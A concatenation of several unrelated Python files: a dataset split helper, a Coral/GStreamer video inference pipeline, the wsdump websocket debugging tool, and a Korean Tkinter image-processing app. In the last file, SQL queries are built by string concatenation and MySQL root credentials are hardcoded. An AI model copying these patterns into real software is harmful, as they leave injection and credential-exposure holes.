def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit('../coco128')
Arguments
path: Path to images directory
weights: Train, val, test weights (list)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in img_formats], []) # image files only
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
gstreamer.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modification by La Labomedia July 2021
import sys
import threading
import time
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstBase', '1.0')
gi.require_version('GstVideo', '1.0')
gi.require_version('Gtk', '3.0')
from gi.repository import GLib, GObject, Gst, GstBase, GstVideo, Gtk
Gst.init(None)
class GstPipeline:
def __init__(self, pipeline, inf_callback, render_callback, src_size):
self.inf_callback = inf_callback
self.render_callback = render_callback
self.running = False
self.gstbuffer = None
self.output = None
self.sink_size = None
self.src_size = src_size
self.box = None
self.condition = threading.Condition()
self.pipeline = Gst.parse_launch(pipeline)
self.freezer = self.pipeline.get_by_name('freezer')
self.overlay = self.pipeline.get_by_name('overlay')
self.overlaysink = self.pipeline.get_by_name('overlaysink')
appsink = self.pipeline.get_by_name('appsink')
appsink.connect('new-sample', self.on_new_sample)
# Set up a pipeline bus watch to catch errors.
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_bus_message)
# Set up a full screen window on Coral, no-op otherwise.
self.setup_window()
def run(self):
# Start inference worker.
self.running = True
inf_worker = threading.Thread(target=self.inference_loop)
inf_worker.start()
render_worker = threading.Thread(target=self.render_loop)
render_worker.start()
# Run pipeline.
self.pipeline.set_state(Gst.State.PLAYING)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
# We're high latency on higher resolutions, don't drop our late frames.
if self.overlaysink:
sinkelement = self.overlaysink.get_by_interface(GstVideo.VideoOverlay)
else:
sinkelement = self.pipeline.get_by_interface(GstVideo.VideoOverlay)
sinkelement.set_property('sync', False)
sinkelement.set_property('qos', False)
try:
Gtk.main()
except:
pass
# Clean up.
self.pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
with self.condition:
self.running = False
self.condition.notify_all()
inf_worker.join()
render_worker.join()
def on_bus_message(self, bus, message):
t = message.type
if t == Gst.MessageType.EOS:
Gtk.main_quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
Gtk.main_quit()
return True
def on_new_sample(self, sink):
sample = sink.emit('pull-sample')
if not self.sink_size:
s = sample.get_caps().get_structure(0)
self.sink_size = (s.get_value('width'), s.get_value('height'))
with self.condition:
self.gstbuffer = sample.get_buffer()
self.condition.notify_all()
return Gst.FlowReturn.OK
def get_box(self):
if not self.box:
glbox = self.pipeline.get_by_name('glbox')
if glbox:
glbox = glbox.get_by_name('filter')
box = self.pipeline.get_by_name('box')
assert glbox or box
assert self.sink_size
if glbox:
self.box = (glbox.get_property('x'), glbox.get_property('y'),
glbox.get_property('width'), glbox.get_property('height'))
else:
self.box = (-box.get_property('left'), -box.get_property('top'),
self.sink_size[0] + box.get_property('left') + box.get_property('right'),
self.sink_size[1] + box.get_property('top') + box.get_property('bottom'))
return self.box
def inference_loop(self):
while True:
with self.condition:
while not self.gstbuffer and self.running:
self.condition.wait()
if not self.running:
break
gstbuffer = self.gstbuffer
self.gstbuffer = None
# Input tensor is expected to be tightly packed, that is,
# width and stride in pixels are expected to be the same.
# For the Coral devboard using GPU this will always be true,
# but when using generic GStreamer CPU based elements the line
# stride will always be a multiple of 4 bytes in RGB format.
# In case of mismatch we have to copy the input line by line.
# For best performance input tensor size should take this
# into account when using CPU based elements.
# TODO: Use padded posenet models to avoid this.
meta = GstVideo.buffer_get_video_meta(gstbuffer)
assert meta and meta.n_planes == 1
bpp = 3 # bytes per pixel.
buf_stride = meta.stride[0] # 0 for first and only plane.
inf_stride = meta.width * bpp
if inf_stride == buf_stride:
# Fast case, pass buffer as input tensor as is.
input_tensor = gstbuffer
else:
# Slow case, need to pack lines tightly (copy).
result, mapinfo = gstbuffer.map(Gst.MapFlags.READ)
assert result
data_view = memoryview(mapinfo.data)
input_tensor = bytearray(inf_stride * meta.height)
src_offset = dst_offset = 0
for row in range(meta.height):
src_end = src_offset + inf_stride
dst_end = dst_offset + inf_stride
input_tensor[dst_offset : dst_end] = data_view[src_offset : src_end]
src_offset += buf_stride
dst_offset += inf_stride
input_tensor = bytes(input_tensor)
gstbuffer.unmap(mapinfo)
output = self.inf_callback(input_tensor)
with self.condition:
self.output = output
self.condition.notify_all()
def render_loop(self):
while True:
with self.condition:
while not self.output and self.running:
self.condition.wait()
if not self.running:
break
output = self.output
self.output = None
svg, freeze = self.render_callback(output, self.src_size, self.get_box())
self.freezer.frozen = freeze
if self.overlaysink:
self.overlaysink.set_property('svg', svg)
elif self.overlay:
self.overlay.set_property('data', svg)
def setup_window(self):
# Only set up our own window if we have Coral overlay sink in the pipeline.
if not self.overlaysink:
return
gi.require_version('GstGL', '1.0')
from gi.repository import GstGL
# Needed to commit the wayland sub-surface.
def on_gl_draw(sink, widget):
widget.queue_draw()
# Needed to account for window chrome etc.
def on_widget_configure(widget, event, overlaysink):
allocation = widget.get_allocation()
overlaysink.set_render_rectangle(allocation.x, allocation.y,
allocation.width, allocation.height)
return False
window = Gtk.Window(Gtk.WindowType.TOPLEVEL)
window.fullscreen()
drawing_area = Gtk.DrawingArea()
window.add(drawing_area)
drawing_area.realize()
self.overlaysink.connect('drawn', on_gl_draw, drawing_area)
# Wayland window handle.
wl_handle = self.overlaysink.get_wayland_window_handle(drawing_area)
self.overlaysink.set_window_handle(wl_handle)
# Wayland display context wrapped as a GStreamer context.
wl_display = self.overlaysink.get_default_wayland_display_context()
self.overlaysink.set_context(wl_display)
drawing_area.connect('configure-event', on_widget_configure, self.overlaysink)
window.connect('delete-event', Gtk.main_quit)
window.show_all()
# The appsink pipeline branch must use the same GL display as the screen
# rendering so they get the same GL context. This isn't automatically handled
# by GStreamer as we're the ones setting an external display handle.
def on_bus_message_sync(bus, message, overlaysink):
if message.type == Gst.MessageType.NEED_CONTEXT:
_, context_type = message.parse_context_type()
if context_type == GstGL.GL_DISPLAY_CONTEXT_TYPE:
sinkelement = overlaysink.get_by_interface(GstVideo.VideoOverlay)
gl_context = sinkelement.get_property('context')
if gl_context:
display_context = Gst.Context.new(GstGL.GL_DISPLAY_CONTEXT_TYPE, True)
GstGL.context_set_gl_display(display_context, gl_context.get_display())
message.src.set_context(display_context)
return Gst.BusSyncReply.PASS
bus = self.pipeline.get_bus()
bus.set_sync_handler(on_bus_message_sync, self.overlaysink)
def on_bus_message(bus, message, loop):
t = message.type
if t == Gst.MessageType.EOS:
loop.quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
loop.quit()
return True
def detectCoralDevBoard():
try:
if 'MX8MQ' in open('/sys/firmware/devicetree/base/model').read():
print('Detected Edge TPU dev board.')
return True
except:
pass
return False
class Freezer(GstBase.BaseTransform):
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (Gst.PadTemplate.new('sink',
Gst.PadDirection.SINK,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any()),
Gst.PadTemplate.new('src',
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any())
)
def __init__(self):
self.buf = None
self.frozen = False
self.set_passthrough(False)
def do_prepare_output_buffer(self, inbuf):
if self.frozen:
if not self.buf:
self.buf = inbuf
src_buf = self.buf
else:
src_buf = inbuf
buf = Gst.Buffer.new()
buf.copy_into(src_buf, Gst.BufferCopyFlags.FLAGS | Gst.BufferCopyFlags.TIMESTAMPS |
Gst.BufferCopyFlags.META | Gst.BufferCopyFlags.MEMORY, 0, inbuf.get_size())
buf.pts = inbuf.pts
return (Gst.FlowReturn.OK, buf)
def do_transform(self, inbuf, outbuf):
return Gst.FlowReturn.OK
def register_elements(plugin):
gtype = GObject.type_register(Freezer)
Gst.Element.register(plugin, 'freezer', 0, gtype)
return True
Gst.Plugin.register_static(
Gst.version()[0], Gst.version()[1], # GStreamer version
'', # name
'', # description
register_elements, # init_func
'', # version
'unknown', # license
'', # source
'', # package
'' # origin
)
def run_pipeline(inf_callback,
render_callback,
src_size,
inference_size,
mirror=False,
h264=False,
jpeg=False,
videosrc='/dev/video0'):
if h264:
SRC_CAPS = 'video/x-h264,width={width},height={height},framerate=30/1'
elif jpeg:
SRC_CAPS = 'image/jpeg,width={width},height={height},framerate=30/1'
else:
SRC_CAPS = 'video/x-raw,width={width},height={height},framerate=30/1'
PIPELINE = 'v4l2src device=%s ! {src_caps}'%videosrc
if detectCoralDevBoard():
scale_caps = None
PIPELINE += """ ! decodebin ! glupload ! glvideoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! freezer name=freezer ! glsvgoverlaysink name=overlaysink
t. ! {leaky_q} ! glfilterbin filter=glbox name=glbox ! {sink_caps} ! {sink_element}
"""
else: # raspberry pi or linux
scale = min(inference_size[0] / src_size[0], inference_size[1] / src_size[1])
scale = tuple(int(x * scale) for x in src_size)
scale_caps = 'video/x-raw,width={width},height={height}'.format(width=scale[0], height=scale[1])
PIPELINE += """ ! decodebin ! videoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! videoconvert ! freezer name=freezer ! rsvgoverlay name=overlay
! videoconvert ! autovideosink
t. ! {leaky_q} ! videoconvert ! videoscale ! {scale_caps} ! videobox name=box autocrop=true
! {sink_caps} ! {sink_element}
"""
SINK_ELEMENT = 'appsink name=appsink emit-signals=true max-buffers=1 drop=true'
SINK_CAPS = 'video/x-raw,format=RGB,width={width},height={height}'
LEAKY_Q = 'queue max-size-buffers=1 leaky=downstream'
direction = 'horiz' if mirror else 'identity'
src_caps = SRC_CAPS.format(width=src_size[0], height=src_size[1])
sink_caps = SINK_CAPS.format(width=inference_size[0], height=inference_size[1])
pipeline = PIPELINE.format(src_caps=src_caps, sink_caps=sink_caps,
sink_element=SINK_ELEMENT, direction=direction, leaky_q=LEAKY_Q, scale_caps=scale_caps)
print('Gstreamer pipeline: ', pipeline)
pipeline = GstPipeline(pipeline, inf_callback, render_callback, src_size)
pipeline.run()
|
main.py | from multiprocessing import Process, Pipe
from fb2twilio import run as runF2T
from twilio2fb import run as runT2F
if __name__ == '__main__':
Process(target=runF2T, args=()).start()
Process(target=runT2F, args=()).start()
print 'Facetwilio active...'
|
wsdump.py | #!C:\Users\louis\Documents\GitHub\instagram_bot\tidl\Scripts\python.exe
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
tk_raw_analy_ver0.5.py |
## 영상 처리 및 데이터 분석 툴
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## 함수 선언부
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # 파일 크기 확인
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'rb') # 파일 열기(바이너리 모드)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 기존에 캐버스 있으면 뜯어내기.
if canvas != None :
canvas.destroy()
# 화면 준비 (고정됨)
window.geometry(str(outH) + 'x' + str(outW))
canvas = Canvas(window, width=outW, height=outH)
paper = PhotoImage(width=outW, height=outH)
canvas.create_image((outW/2, outH/2), image=paper, state='normal')
# 화면에 출력
def putPixel() :
for i in range(0, outH) :
for k in range(0, outW) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data), (k,i))
threading.Thread(target=putPixel).start()
canvas.pack()
def equal() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # 밝게하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # 입출력 영상의 평균값
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg) ); label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg)); label2.pack()
subWindow.mainloop()
def upDown() : # 상하 반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[outW-1-i][k] = inImage[i][k]
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # 축소하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outH):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
pass
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'r') # 파일 열기(바이너리 모드)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) + \
"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok!')
def openSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
## 전역 변수부
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
## 메인 코드부
window = Tk(); window.geometry('200x200');
window.title('영상 처리&데이터 분석 Ver 0.5')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
